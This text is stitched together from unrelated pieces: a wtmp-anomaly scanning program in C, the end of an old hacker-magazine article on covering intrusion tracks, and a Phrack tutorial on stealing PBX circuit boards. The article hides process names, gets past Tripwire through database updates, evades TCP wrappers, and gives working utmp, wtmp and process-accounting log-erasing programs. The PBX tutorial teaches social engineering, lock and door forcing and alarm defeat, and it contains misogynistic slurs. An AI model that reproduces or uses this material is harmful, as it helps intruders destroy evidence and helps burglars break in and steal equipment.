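                memcpy(open_line[nopen++], r->ut_line, 8);
        } else if (k < nopen) {                              /* matched logout */
            memmove(open_line[k], open_line[--nopen], 8);
        } else {
            out->orphan_logouts++;                           /* login is missing */
        }
    }
}

/* Build one zero-padded record for the constructed sample. */
static struct old_utmp mk(const char *line, const char *name,
                          const char *host, int32_t t)
{
    struct old_utmp r;
    memset(&r, 0, sizeof r);
    memcpy(r.ut_line, line, strlen(line) < 8 ? strlen(line) : 8);
    memcpy(r.ut_name, name, strlen(name) < 8 ? strlen(name) : 8);
    memcpy(r.ut_host, host, strlen(host) < 16 ? strlen(host) : 16);
    r.ut_time = t;
    return r;
}

/* Constructed sample: a wtmp in which one login record has been blanked.
 * Host addresses come from the 192.0.2.0/24 documentation range. */
struct wtmp_findings scan_sample(void)
{
    struct old_utmp w[6];
    struct wtmp_findings f;
    w[0] = mk("~", "reboot", "", 1000);
    w[1] = mk("ttyp0", "alice", "192.0.2.10", 1100);
    memset(&w[2], 0, sizeof w[2]);                  /* blanked login, ttyp1 */
    w[3] = mk("ttyp1", "", "", 1300);               /* its logout survives */
    w[4] = mk("ttyp0", "", "", 1400);
    w[5] = mk("ttyp2", "bob", "192.0.2.11", 1350);  /* earlier than previous */
    scan_wtmp(w, 6, &f);
    return f;
}

int main(void)
{
    struct wtmp_findings f = scan_sample();
    printf("records=%d zeroed=%d time_regressions=%d orphan_logouts=%d\n",
           f.records, f.zeroed, f.time_regressions, f.orphan_logouts);
    return 0;
}
```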
Here is the common structure for the process accounting file:

     struct acct {
          char   ac_comm[10];   /* Accounting command name */
          comp_t ac_utime;      /* Accounting user time */
          comp_t ac_stime;      /* Accounting system time */
          comp_t ac_etime;      /* Accounting elapsed time */
          time_t ac_btime;      /* Beginning time */
          uid_t  ac_uid;        /* Accounting user ID */
          gid_t  ac_gid;        /* Accounting group ID */
          short  ac_mem;        /* average memory usage */
          comp_t ac_io;         /* number of disk IO blocks */
          dev_t  ac_tty;        /* control typewriter */
          char   ac_flag;       /* Accounting flag */
     };

It is extremely tricky to remove all of your account records since if you do use a program to remove them, the program that you run to wipe the records will still have a process that will be appended to the logfile after it has completed.

An example program for removing process accounting records is included at the end of this article.

Most sysadmins don't pay real attention to the process logs, since they do tend to be rather large and grow fast. However, if they notice that a break-in has occurred, this is one of the primary places they will look for further evidence.

On the other hand, for normal system monitoring, you should be more worried about your "active" processes that might show up in a process table listing (such as ps or top).

Most platforms allow the general changing of the process name without having any kind of privileges to do so. This is done with a simple program as noted below:

     #include <stdio.h>
     #include <string.h>

     int main(argc, argv)
     int argc;
     char **argv;
     {
          char *p;

          /* blank out the original argv[0] string in place */
          for (p = argv[0]; *p; p++)
               *p = 0;

          strcpy(argv[0], "rn");

          (void) getchar ();  /* to allow you to see that ps reports "rn" */
          return(0);
     }

Basically, this program waits for a key-stroke and then exits. But, while it's waiting, if you were to look up the process it would show the name as being "rn". You're just actually re-writing the argument list of the spawned process. This is a good method of hiding your process or program names ("crack", "hackit", "icmpnuker").
It's a good idea to use this method in any "rogue" programs you might not want to be discovered by a system administrator.

If you can't corrupt your process arguments, rename your program to something that at least looks normal on the system. But, if you do this, make sure that you don't run the command as "./sh" or "./ping" .. Even this looks suspicious. Put your current path in front of your PATH environment variable and avoid this mistake.

# Tripping the wire

That little piss-ant up at Purdue thinks he has invented a masterpiece.. I'll let his words explain what "Tripwire" is all about. Then, I'll go over some brief flaws in tripwire and how to circumvent it.

---- Tripwire README Introduction

1.0. Background
================

With the advent of increasingly sophisticated and subtle account break-ins on Unix systems, the need for tools to aid in the detection of unauthorized modification of files becomes clear. Tripwire is a tool that aids system administrators and users in monitoring a designated set of files for any changes. Used with system files on a regular (e.g., daily) basis, Tripwire can notify system administrators of corrupted or tampered files, so damage control measures can be taken in a timely manner.

1.1. Goals of Tripwire
=======================

Tripwire is a file integrity checker, a utility that compares a designated set of files against information stored in a previously generated database. Any differences are flagged and logged, and optionally, a user is notified through mail. When run against system files on a regular basis, any changes in critical system files will be spotted -- and appropriate damage control measures can be taken immediately. With Tripwire, system administrators can conclude with a high degree of certainty that a given set of files remain free of unauthorized modifications if Tripwire reports no changes.

---- End of Tripwire excerpt

Ok, so you know what tripwire does.
Yup, it creates signatures for all files listed in a tripwire configuration file. So, if you were to change a file that is "tripwired", the proper authorities would be notified and your changes could be recognized. Gee. That sounds great. But there are a couple of problems with this.

First, tripwire wasn't made to run continuously (i.e., a change to a system binary might not be noticed for several hours, perhaps days.) This allows somewhat of a "false" security for those admins who install tripwire.

The first step in beating tripwire is to know if the system you are on is running it. This is trivial at best. The default locations where tripwire installs its databases are /usr/adm/tcheck or /usr/local/adm/tcheck.

The "tcheck" directory is basically made up of the following files:

     -rw-------  1 root  4867 tw.config
     drwxr-----  2 root   512 databases

The file "tw.config" is the tripwire configuration file. Basically, it's a list of files that tripwire will create signatures for. This file usually consists of all system binaries, devices, and configuration files.

The directory "databases" contains the actual tripwire signatures for every system that is configured in tw.config. The format for the database filenames is tw.db_HOSTNAME.

An example signature entry might look like:

     /bin/login 27 ../z/. 100755 901 1 0 0 50412 .g53Lz .g4nrh .g4nrt 0 1vOeWR/aADgc0 oQB7C1cCTMd 1T2ie4.KHLgS0xG2B81TVUfQ 0 0 0 0 0 0 0

Nothing to get excited about. Basically it is a signature encrypted in one of the many forms supplied by tripwire. Hard to forge, but easy to bypass.

Tripwire takes a long time to check each file or directory listed in the configuration file. Therefore, it is possible to patch or change a system file before tripwire runs a signature check on it. How does one do this? Well, let me explain some more.

In the design of tripwire, the databases are supposed to be kept either on a secure server or a read-only filesystem.
Usually, if you would want to patch a system binary 9 times out of 10 you're going to want to have root access. Having root access to by-pass tripwire is a must. Therefore, if you can obtain this access then it is perfectly logical that you should be able to remount a filesystem as Read/Write. Once accomplished, after installing your patched binary, all you have to do is:

     tripwire -update PATH_TO_PATCHED_BINARY

Then, you must also:

     tripwire -update /usr/adm/tcheck/databases/tw.db_HOSTNAME

(If they are making a signature for the tripwire database itself)

You'll still be responsible for the changed inode times on the database. But that's the risk you'll have to live with. Tripwire won't detect the change since you updated the database. But an admin might notice the changed times.

# Wrapping up the wrappers

Ta da. You got the access. uh-oh. What if they are running a TCP wrapper? There are three basic ways they could be running a wrapper.

1) They have modified /etc/inetd.conf and replaced the daemons they want to wrap with another program that records the incoming hostname and then spawns the correct daemon.

2) They have replaced the normal daemons (usually in /usr/etc) with a program that records the hostname then launches the correct daemon.

3) They have modified the actual wrappers themselves to record incoming connections.

In order to bypass or disable them, you'll first need to know which method they are using.

First, view /etc/inetd.conf and check to see if you see something similar to:

     telnet stream tcp nowait root /usr/etc/tcpd telnetd ttyXX

This is a sure sign that they are running Wietse Venema's tcp_wrapper.

If nothing is found in /etc/inetd.conf, check /usr/etc and check for any abnormal programs such as "tcpd", "wrapd", and "watchcatd".
Finally, if nothing is still found, try checking the actual daemons by running "strings" on them and looking for logfiles or by using sum and comparing them to another system of the same OS that you know is not using a wrapper.

Okay, by now you know whether or not they have a wrapper installed. If so you will have to now decide what to do with the output of the wrapper. You'll have to know where it put the information. The most common wrapper used is tcp_wrapper. Here is another README excerpt detailing where the actual output from the wrappers is delivered.

---- Begin of tcp_wrapper README

3.2 - Where the logging information goes
----------------------------------------

The wrapper programs send their logging information to the syslog daemon (syslogd). The disposition of the wrapper logs is determined by the syslog configuration file (usually /etc/syslog.conf). Messages are written to files, to the console, or are forwarded to a @loghost.

Older syslog implementations (still found on Ultrix systems) only support priority levels ranging from 9 (debug-level messages) to 0 (alerts). All logging information of the same priority level (or more urgent) is written to the same destination. In the syslog.conf file, priority levels are specified in numerical form. For example,

     8/usr/spool/mqueue/syslog

causes all messages with priority 8 (informational messages), and anything that is more urgent, to be appended to the file /usr/spool/mqueue/syslog.

Newer syslog implementations support message classes in addition to priority levels. Examples of message classes are: mail, daemon, auth and news. In the syslog.conf file, priority levels are specified with symbolic names: debug, info, notice, ..., emerg. For example,

     mail.debug	/var/log/syslog

causes all messages of class mail with priority debug (or more urgent) to be appended to the /var/log/syslog file.

By default, the wrapper logs go to the same place as the transaction logs of the sendmail daemon.
The disposition can be changed by editing the Makefile and/or the syslog.conf file. Send a `kill -HUP' to the syslogd after changing its configuration file. Remember that syslogd, just like sendmail, insists on one or more TABs between the left-hand side and the right-hand side expressions in its configuration file.

---- End of tcp_wrapper README

Usually just editing the output and hoping the sysadmin didn't catch the wrap will do the trick since nothing is output to the console (hopefully).

# Example programs

The following are short and sweet programs that give you the ability to edit some of the more common logfiles found on most platforms. Most of these are pretty simple to compile, although some might need minor porting and OS consideration changes in structures and configurations.

---- Begin of /etc/utmp editor:

/* This program removes utmp entries by name or number */ #include #include #include #include void usage(name) char *name; { printf(stdout, "Usage: %s [ user ] or [ tty ]\n", name); exit(1); } main(argc,argv) int argc; char **argv; { int fd; struct utmp utmp; int size; int match, tty = 0; if (argc!=2) usage(argv[0]); if ( !strncmp(argv[1],"tty",3) ) tty++; fd = open("/etc/utmp",O_RDWR); if (fd >= 0) { size = read(fd, &utmp, sizeof(struct utmp)); while ( size == sizeof(struct utmp) ) { if ( tty ? 
( !strcmp(utmp.ut_line, argv[1]) ) : ( !strcmp(utmp.ut_name, argv[1]) ) ) { lseek( fd, -sizeof(struct utmp), L_INCR ); bzero( &utmp, sizeof(struct utmp) ); write( fd, &utmp, sizeof(struct utmp) ); } size = read( fd, &utmp, sizeof(struct utmp) ); } } close(fd); } ---- End of /etc/utmp editor ---- Begin of /usr/adm/wtmp editor: /* This program removes wtmp entries by name or tty number */ #include #include #include #include void usage(name) char *name; { printf("Usage: %s [ user | tty ]\n", name); exit(1); } void main (argc, argv) int argc; char *argv[]; { struct utmp utmp; int size, fd, lastone = 0; int match, tty = 0, x = 0; if (argc>3 || argc<2) usage(argv[0]); if (strlen(argv[1])<2) { printf("Error: Length of user\n"); exit(1); } if (argc==3) if (argv[2][0] == 'l') lastone = 1; if (!strncmp(argv[1],"tty",3)) tty++; if ((fd = open("/usr/adm/wtmp",O_RDWR))==-1) { printf("Error: Open on /usr/adm/wtmp\n"); exit(1); } printf("[Searching for %s]: ", argv[1]); if (fd >= 0) { size = read(fd, &utmp, sizeof(struct utmp)); while ( size == sizeof(struct utmp) ) { if ( tty ? ( !strcmp(utmp.ut_line, argv[1]) ) : ( !strncmp(utmp.ut_name, argv[1], strlen(argv[1])) ) && lastone != 1) { if (x==10) printf("\b%d", x); else if (x>9 && x!=10) printf("\b\b%d", x); else printf("\b%d", x); lseek( fd, -sizeof(struct utmp), L_INCR ); bzero( &utmp, sizeof(struct utmp) ); write( fd, &utmp, sizeof(struct utmp) ); x++; } size = read( fd, &utmp, sizeof(struct utmp) ); } } if (!x) printf("No entries found."); else printf(" entries removed."); printf("\n"); close(fd); } ---- End of /usr/adm/wtmp editor ---- Begin of /usr/adm/lastcomm editor: #!/perl package LCE; $date = 'Sun Jul 4 20:35:36 CST 1993'; $title = 'LCE'; $author = 'Phreak Accident'; $version = '0.0'; $copyright = 'Copyright Phreak Accident'; #------------------------------------------------------------------------------ # begin getopts.pl # Usage: &Getopts('a:bc'); # -a takes arg. -b & -c not. Sets opt_*. 
sub Getopts { local($argumentative)=@_; local(@args,$_,$first,$rest,$errs); local($[)=0; @args=split(/ */, $argumentative ); while(($_=$ARGV[0]) =~ /^-(.)(.*)/) { ($first,$rest) = ($1,$2); $pos = index($argumentative,$first); if($pos >= $[) { if($args[$pos+1] eq ':') { shift(@ARGV); if($rest eq '') { $rest = shift(@ARGV); } eval "\$opt_$first = \$rest;"; } else { eval "\$opt_$first = 1"; if($rest eq '') { shift(@ARGV); } else { $ARGV[0] = "-$rest"; } } } else { print STDERR "Unknown option: $first\n"; ++$errs; if($rest ne '') { $ARGV[0] = "-$rest"; } else { shift(@ARGV); } } } $errs == 0; } # end getopts.pl #------------------------------------------------------------------------------ sub Initialize { $TRUE = '1'; # '1' = TRUE = '1' $FALSE = ''; # '' = FALSE = '' &Getopts('a:u:o:'); # Parse command line options $acct = $opt_a || $ENV{'ACCT'} || '/var/adm/pacct'; $user = $opt_u || $ENV{'USER'} || `/bin/whoami` || 'root'; $outf = $opt_o || $ENV{'OUTF'} || './.pacct'; select(STDOUT); $|++; close(I); open(I,'(cd /dev; echo tty*)|'); $ttys=; close(I); @ttys = split(/ /,$ttys); for $tty (@ttys) { ($dev,$ino,$mode,$nlink,$uid,$gid,$rdev,$size, $atime,$mtime,$ctime,$blksize,$blocks) = stat("/dev/$tty"); $TTY{"$rdev"} = "$tty"; } $TTY{'65535'} = 'NoTTY'; # Get passwd info --> id:passwd:uid:gid:name:home:shell close (I); # open(I,"cat /etc/passwd|"); # If you don't run nis... open(I,"ypcat passwd|"); while () { chop; split(/:/); $PASSWD{"$_[$[+2]"}= $_[$[]; } $PASSWD{"0"}= 'root'; # Get group info --> id:passwd:gid:members close (I); # open(I,"cat /etc/group|"); # If you don't run nis... 
open(I,"ypcat group | "); while () { chop; split(/:/); $GROUP{"$_[$[+2]"}= $_[$[]; } } split(/ /,'Sun Mon Tue Wed Thu Fri Sat'); for ($x=$[ ; $x<$#_ ; $x++) { $DAY{"$x"} = $_[$x]; } split(/ /,'Error Jan Feb Mar Apr MAy Jun Jul Aug Sep Oct Nov Dec'); for ($x=$[ ; $x<$#_ ; $x++) { $MONTH{"$x"} = $_[$x]; } #------------------------------------------------------------------------------ sub LCE { &Initialize(); open(I,"<$acct"); close(O); open(O,">$outf"); $template='CCSSSLSSSSSSA8'; while (read(I,$buff,32)) { ($c1,$c2,$u,$g,$d,$bt,$ut,$st,$et,$o4,$o5,$o6,$c3) = unpack($template,$buff); ($sec,$min,$hour,$mday,$mon,$year,$wday,$yday,$isdst) = localtime($bt); $mon++; $mon = "0$mon" if ($mon < 10); $mday = "0$mday" if ($mday < 10); $hour = "0$hour" if ($hour < 10); $min = "0$min" if ($min < 10); $sec = "0$sec" if ($sec < 10); $tt = localtime($bt); $flags=''; if ($c1 & 0001) { $flags .= 'F'; } if ($c1 & 0002) { $flags .= 'S'; } if ($c1 & 0004) { $flags .= 'P'; } if ($c1 & 0010) { $flags .= 'C'; } if ($c1 & 0020) { $flags .= 'K'; } if ($c1 & 0300) { $flags .= 'A'; } $c3 =~ s/\000.*$//; print STDOUT "$c3 $flags $PASSWD{$u}/$GROUP{$g} $TTY{$d}"; print STDOUT " $DAY{$wday} $hour:$min:$sec"; if ($PASSWD{$u} eq $user) { print " [ERASED] "; } else { print O pack($template,$c1,$c2,$u,$g,$d,$bt,$ut,$st,$et,$o4,$o5,$o6,$c3); } print "\n"; } close(O); } #------------------------------------------------------------------------------ &LCE(); #struct acct # { # char ac_flag; /* Accounting flag */ # char ac_stat; /* Exit status */ # uid_t ac_uid; /* Accounting user ID */ # gid_t ac_gid; /* Accounting group ID */ # dev_t ac_tty; /* control typewriter */ # time_t ac_btime; /* Beginning time */ # comp_t ac_utime; /* Accounting user time */ # comp_t ac_stime; /* Accounting system time */ # comp_t ac_etime; /* Accounting elapsed time */ # comp_t ac_mem; /* average memory usage */ # comp_t ac_io; /* chars transferred */ # comp_t ac_rw; /* blocks read or written */ # char ac_comm[8]; /* 
Accounting command name */ # }; # # #define AFORK 0001 /* has executed fork, but no exec */ # #define ASU 0002 /* used super-user privileges */ # #define ACOMPAT 0004 /* used compatibility mode */ # #define ACORE 0010 /* dumped core */ # #define AXSIG 0020 /* killed by a signal */ # #define ACCTF 0300 /* record type: 00 = acct */

---- End of /usr/adm/lastcomm editor

# All good things must come to an end

In conclusion, you need to be smarter than the administrator. Being careless can get you busted. Clean your footprints. Watch the system. Learn new tricks. AND KEEP ON HACKING!

Watch for my next article on 50 great system patches that will keep your access just the way it is .. illegal. Yaawhoo.

# End of article

                              ==Phrack Magazine==

                 Volume Four, Issue Forty-Three, File 15 of 27

[** NOTE: The following file is presented for informational purposes only. Phrack Magazine takes no responsibility for anyone who attempts the actions described within. **]

***************************************************************************

                  Physical Access & Theft of PBX Systems

                              A DSR Tutorial
             by : CO/der DEC/oder & Cablecast 0perator.

              (K)opywronged 1993, by Dark Side Research

***************************************************************************

BACKGROUND
~~~~~~~~~~

July 1989, Mobil Oil Corporation Headquarters -- Fairfax, VA.

Abundant technology, late hours, and shadows between city lights made up the typical environment CO/der DEC/oder repeatedly found adventure in. On one such night in the summer of '89, a reconnaissance outing landed him at the offices of Mobil Oil Corp. The door leading from the multi-level parking garage into the foyer was equipped with an access-request phone and a square black pad. The pad was flush with the wall, and sported a red LED in its center -- a rather imposing device used to read magnetic access cards. CODEC picked up the phone and listened to a couple rings followed by the voice of a security guard,

"Good evening, security ..."
"Evenin', this is Dick Owens with CACI graphics. I don't have a card, but just call upstairs and they'll verify." "Hold on, sir ..." Kastle Security's verification call registered as a sudden 90 VAC spike on Cablecast 0perator's meter. Clipped on the blue and white pair of CACI's incoming hunt group, Cable picked up on his TS-21: "Hello?" "This is Kastle Security. We've got a Dick Owens downstairs requesting access." "Yeah Sure. Let him in please." The security man took Codec off hold, "Okay sir, what entrance are you at?" "Garage level one." The door clicked, and in went the hacker-thief -- grinning. Another lock at the end of a hallway also hindered access, but a screwdriver, placed between door and frame, removed the obstruction with a quickly applied force. CACI was a graphics outfit sharing the same building with Mobil. After a perusal through its desks and darkened corridors turned up a cardkey for later use, Codec -- pausing casually along the way at the drunking fountain -- made his way to the opposite end of the hallway and into Mobil's mail receiving room. In contrast to elsewhere in the building, this room was chilly -- as if heavy air conditioning was nearby. There was also a faint roar of fans to enhance this notion. And behind a countertop in the direction of the noise, a split door could be seen through which mail and parcels were passed during business hours. Hardly an obstacle, he was on the other side in an instant. This "other side" was no less than a gateway to nirvana. At first he began taking in the sight of a mini-computer, console, and mass storage devices, but his eyes were virtually pulled to the giant on his left. It was the largest and most impressive PBX he had yet seen; a label above the five gargantuan, interconnected cabinets read, "AT&T SYSTEM 85." The hacker's heart raced -- he wanted to explore, control, and own the switch all at once. 
Within seconds his gloved hands caressed the cabinets while his hungry eyes scanned circuit pack descriptors, mouth agape. Codec grabbed some manuals, jotted down numbers to a modem stack, and reluctantly departed. A week later, he stole the switch. To the Dark Side Research group, the System 85 would be worth approximately $100,000 -- but to Mobil, the system was worth at least six times that figure. In its entirety it was more valuable, but DSR was only concerned with the guts; the digital circuitry of the system. When Codec reentered the building the following week, he was wearing a VOX headset attached to a hand-held 2-meter band (HAM) radio. This was strapped to his chest except for the rubber-whip antenna which protruded out of a hole in his jacket. His awestruck, gleeful countenance from a week prior had been replaced by a more grave expression, and the moisture now on his body was no longer from unconscious salivation but due to the sweat of anticipation and rapid movement. "Phase one complete," he spoke into the boom mic in front of his face. "Roger Nine-Two. Quit breathing on the VOX or adjust sensitivity, over." "Roger Nine-Three. Entering heavy EMI area," Codec acknowledged to one of the lookouts. Steps were retraced through the mail room, where several empty boxes marked "U.S. Mail" and a dolly were conveniently stored. The System 85 was shut down, cabinet by cabinet, as most of the circuit boards were hastily removed and boxed. Seven boxes were filled, requiring two trips with the dolly to a side door. "All units: ready for docking." "Roger Nine-Two. Standby. Nine-Three, okay for docking?" "Step on it, over ..." A Ford Escort with its hatch open raced up to where Codec and the boxes stood. Within fifteen minutes the circuit packs were unloaded in a public storage unit. 
Within half an hour, CO/der DEC/oder, Cablecast 0perator, and the remainder of the night's crew were filling up with doughnuts at the nearby 7-11, observing local law enforcement doing the same.

APRIL 1993: Security memorandum broadcast from wrq.com -- Internet

"We've all heard of toll fraud as a way to steal telecommunications resources. Now the ante has been escalated. I've heard of a company on the East Coast that was having some minor troubles with their PBX. A technician showed up at the door and asked directions to the PBX closet. The company showed this person the way without checking any credentials, and about five minutes later the phones went completely dead. They went up to the PBX closet and found that several boards from the PBX had been removed and that the 'repairman' had departed."

The theft of PBX circuit boards is a novel idea and seldom heard of, but -- as made apparent above -- it does occur. In the used PBX scene, often referred to as the "secondary" or "grey" market, there is always a demand for circuit packs from a wide variety of PBXs. The secondhand PBX industry grew from $285 million in 1990 to $469 million in 1992 -- despite the recession.

The essence of any PBX is a rack or multiple racks of circuit cards/boards/packs, with an average grey market value of anywhere from $50 to $2000 each. The cards are lightweight, small in size, and can even withstand a moderate dose of abuse. Transport of misappropriated circuit boards is done without risk -- under any police scrutiny, a box of these looks like a mere pile of junk (or senior engineering project) in the trunk of your car. Furthermore, the serial numbers on the boards are seldom, if ever, kept track of individually, and these can be removed or "replaced" in any case. Unlike computer equipment or peripherals, PBX cards are extremely safe, simple, and non-proprietary components to handle -- even in quantity.
Although you may wish to physically access PBXs for reasons other than theft, it will be assumed here that monetary gain is your motive. In either case, this introductory file makes it clear that access can be achieved with varying levels of ease. A PBX theft should be thought of in terms of two phases: reconnaissance and extraction. Recon involves finding and selecting prime targets. Extraction is the actual theft of the system. Both phases can be completed through "office building hacking," a wide variety of deception, breaking and entering, social engineering, and technical skills. Phase I : Reconnaissance PBXs are found where people's communications needs warrant the capabilities of such a system -- offices, schools, hotels, convention centers, etc. The PBXs we will concert ourselves with in this discourse however are those located in shared or multiple-leased office structures; the "typical" office buildings. The typical office building has enough floors to require an elevator, some parking space, a lobby, and a company directory (Because it is shared by more than one business). Companies that occupy an entire building by themselves are generally too secure to be worthwhile targets. Tenant companies in the typical building lease all different size office space -- some rent only 300 sq. ft., others take up entire floors. Those that use half a floor or more usually meet the criteria for PBX ownership. Obviously, the larger the firm's office at that site, the greater its PBX will be, so those business spread out over several floors will have the most valuable systems. This is not always an overwhelming factor in determining a target however. The smaller systems are often easier to get at -- and ultimately to remove -- because they tend to be located in utility closets off publicly accessible hallways as opposed to within a room inside an office space. Those closets, sometimes labeled "telephone" and even unlocked, will be found one or two per floor! 
Other closets may exist for electrical equipment, HVAC, plumbing, janitorial supplies, or for a combination of these uses in addition to telephone service. A phone closet is easily distinguishable whether or not a switch or key system is present. A web of low-voltage (22 AWG), multi-colored wiring will be channelled and terminated on a series of white "66" blocks mounted on the wall. These blocks are a few inches wide, and roughly a foot long, with rows of metallic pins that the wiring is punched into with a special tool. As a general rule, if the system is fastened to the wall and doesn't have at least one muffin fan built-in and running, it's either a measly key system or a PBX too small to deserve your attention. Those worthy of your time will stand alone as a cabinet with a hinged door, contain shelves of circuit cards, and emanate the harmonious hum of cooling fans. As an example, Mitel PBXs commonly fit cozily in closets -- sometimes even one of the newer ROLMs or a voice mail system. On the other hand, an NT SL-100 should not be an expected closet find. Wandering through office buildings in search of phone closets during business hours is easy, so long as you dress and act the part. You'll also want to look confident that you know what you're doing and where you're going. Remember, these buildings are open to the public and an employee of one company can't tell whether or not you're a client of another. When going in and out of the phone closets, who's to know you're not a technician or maintenance man? Apart from searching the closets, you can approach the secretaries. Feign being lost and ask to use the telephone. Steal a glance at the console and you'll know (with a little practice) what type of PBX they've got. This is very valuable information, for it may save you from unsuccessfully breaking into the closet (should it be locked) or the company itself. Secretaries are cute, courteous, and dumb. 
You shouldn't have a problem convincing her to give you the key to the phone closet if you're posing as a technician. If you're feeling as confident as you should be, you may even get a date with the bitch. And should you ever raise suspicion, you always have the option of bailing out and making a break for the stairwell. No business exec is going to chase you down. Some additional methods can be employed in conjunction with visiting the buildings, or as a precursor to such : -- Classified ads. A company with job openings is all the more vulnerable to your dark motives. Using the help-wanted section of your newspaper, look for receptionist and secretarial positions. Call and ask, "What type of phone system will I be required to handle?" You may also want to go in and apply for the job -- any job at a large firm will do. You'll learn the type of system installed, some details about security, etc; this is a very sophisticated way of "casin' the joint." -- Scanning for RMATS. Using your preferred wardialer (such as ToneLoc), scan business districts for PBX remote maintenance modems then CNA your finds. -- Targeting interconnects. Interconnects are PBX dealers that sell, install, and maintain the systems on contract. Capture a database of clients and you'll have a windfall of leads and pertinent info. AT&T allegedly sells its database by region. Also, intercept voice mail or company e-mail. Interconnects make decent targets themselves. -- Users groups and newsletters. Some of the extremely large PBX owners join users groups. Though this is abstract, owners will discuss their systems openly at the meetings. Newsletters are mailed out to members, often discussing special applications of specific locations in detail. Great for making sales contacts. Phase II : Extraction Removing the PBX calls for an assessment of obstacles versus available means and methods. The optimum plan incorporates a late afternoon entry with a nighttime departure. 
This means entering the building during business hours and hiding, either in the PBX closet itself or any room or empty space where you can wait until after hours to re-emerge. This is the safest and most effective of methods. You need not worry about alarms or breaking in from outside, and you can take advantage of one of the greatest weaknesses in corporate office security -- janitors. The janitorial staff, if you act and dress properly, will allow you to walk right into an office while they're cleaning. If you're already in an office and they enter, just act like you own the place and it'll be assumed you work there. If you prefer not to be seen, keep hidden until the cleaning is done on your floor. (Be sure not to make the idiotic mistake of hiding in the janitor's closet). Although the custodians will lock the doors behind them, any alarms in the building will remain off until cleaning for the entire structure is complete.

There is simply nothing so elegant as entering the building during the daytime hours, hiding, and re-emerging to wreak havoc when everyone's gone. (A patient wait is required -- take along a Phrack to read). Unfortunately, entry will not always be so easy. The phone closet may have a dead-bolt lock. There may be no feasible hiding place. People may constantly be working late. Because of all the potential variables, you should acquire a repertoire of means and methods. Use of these methods, though easy to learn, is not so quickly mastered. There is a certain "fluidity of technique" gained only through experience. Deciding which to use for a given situation will eventually come naturally.

-- Use of tools. You can easily get around almost any office building using only screwdrivers. With practice, prying doors will be quick and silent. Although some doors have pry-guards or dead-bolts, about every other phone closet you'll encounter can be opened with a screwdriver.
Before forcing the gap between door and frame, try sliding back the locking mechanism. For best results, work it both ways with a pair of screwdrivers; a short one for leverage, a longer one for manipulation. For dead-bolts, a pipe wrench (a wrench with parallel grips) can turn the entire lock 90 degrees. Interior doors are cheaply constructed; if you can wrench the lock, it'll turn and the bolt will be pulled back into the door. Quality dead-bolts have an inclined exterior to prevent it from being gripped. For these, diamond-cutting string can be applied. This is available at select plumbing supply houses for $150 upwards. -- Ceilings and adjacent offices. Not only are the doors cheap inside office buildings, so are the walls. If you're having trouble with a door or lock, push up a ceiling tile with your screwdriver and see if the wall stops or is continuous. If it stops, you may choose to climb over. If you're already inside an office and find a particular room locked, climbing is always an option because walls are never continuous between rooms. Walls are seldom continuous between business either; if you can't get into a particular office space, try through adjacent space. -- Brute force. If making noise is not a serious concern, a crowbar will pry any door open. For most situations requiring this level of force, a sleek, miniature bar is all you need. You can also saw or hammer your way through any interior wall. Once you've made a hole in the sheetrock, you can practically break out the remainder of an opening yourself using only your hands. From the outside, windows can be broken or removed. Office building glass is installed from the outside, so by removing the seal and applying a suction device, you can pull the entire window out. Breaking the glass is not too difficult, but frighteningly loud. Using a screwdriver, push the blade between the edge and its frame and pry. Eventually you'll have holes and cracks running across the window. 
Building glass is typically double-paned; once through the exterior layer, you'll have to break the next. Because the second layer isn't as thick, you have the option of prying or smashing. This sounds extremely primitive -- it is, but it may be the only method available to you. Highly-alarmed office structures do not have the windows wired. When there's a 5,000-port NEC NEAX 2400 in view and alarms everywhere else, you'll break the fucking glass. -- Alarm manipulation. Entire files could be written on this subject. Some relevant facts will be touched on here; no MacGyver shit. Our "typical" office building, if alarmed, has one of three types of alarm plans. The alarm system is either externally-oriented, internally-oriented, or both. More often than not, externally-oriented alarm systems are encountered. These focus on keeping outside intruders from entering the building -- interior offices are secured only by locks. Alarm devices such as magnetic switches and motion detectors are in place solely in lobby areas and on doors leading from outside. If you know in advance that you can readily enter any of the offices, the alarm is harmless. After entering, go directly into the office and look out the window. Eventually, security or police will arrive, look around, then reset the alarm and leave -- so long as you haven't left any trace of your entry (damaged doors, ceiling tile fragments, etc). Although common areas and corridors will be briefly scanned, no company offices will be entered. Internally-oriented alarm plans include alarms on individual offices and are more difficult to reckon with. However, the sensors are only on the doors; any method that avoids opening the door can still be used. Access controls like cardkeys are impressive in appearance but do not automatically represent an alarm. If you open the door without inserting a cardkey, the system must be equipped to know whether a person entered the building or exited. 
Thus, only those systems with motion detectors or a "push button to exit" sign and button can cause an alarm at the cardkey-controlled door. Otherwise the door and cardkey device is no more than a door with an electronic lock. There are always exceptions to the rules, of course; never trust any alarm or access control system. Sometimes a system will be programed to assume any opened door is someone entering, not exiting. Check for sensors -- mounted flush on the door frame -- look carefully, they'll sometimes be painted over. Check both sides and top of the frame. If a sensor is found (or when in doubt) hold the door open for about ten seconds, then wait and watch for up to an hour to see if there's a silent alarm. For the "push button to exit" entrances, you can sometimes use a coat hanger or electricians fish tape to push the button from outside using cracks around the door. Where motion detectors automatically open the entrance, similar devices can be employed to create enough commotion to activate the detector (depending on detector type). Disabling part of the alarm system may be a possibility during the day. Chances are, if you can access the control CPU you've also got a place to hide, and the control box is often alarmed against tampering anyway. Many of the latest systems are continuously monitored from a central station. If not, you can disconnect the alarm box from its phone line. Your best approach however is to alter a door sensor/magnetic switch circuit. You can use a piece of conductive hot water duct tape to trick the sensor into thinking the door is always closed. This tape looks like tin foil with an adhesive on one side. Obtain a similar sensor and test at home before relying on this -- magnetic switches come in many shapes and forms. The better systems don't even check for normally-open or normally-closed states, but for changes in the loop's resistance. This means simply cutting or shorting the lead wires won't suffice. 
But if the conductive tape won't do, you can always just cut the leads and return in a couple days. If the cut hasn't been repaired, then you have an entry point. Building managers become lax with an alarm system after it's been installed for a while and there haven't been any break-ins. Other loops are disabled after late-working employees repeatedly set off the alarm. One other option is to cut and splice both parts of the sensor back into the loop so that it remains unaffected by movement of the door. The throughways to target for any of these alterations are minor side doors such as parking garage or stairwell exits. You should be pleasantly surprised with the results.

-- Locks and picks. (This could be another textfile in itself). Lockpicking is an extremely useful skill for PBX appropriation but requires quite a bit of practice. If you aren't willing to invest the time and patience necessary to become effective with this skill, screwdrivers are the next best thing. Furthermore, with all the different types and brands of locks in existence, you'll never be able to solely rely on your lockpicking skills. Acquire this ability if your involvement in underworld activities is more than just a brief stint...

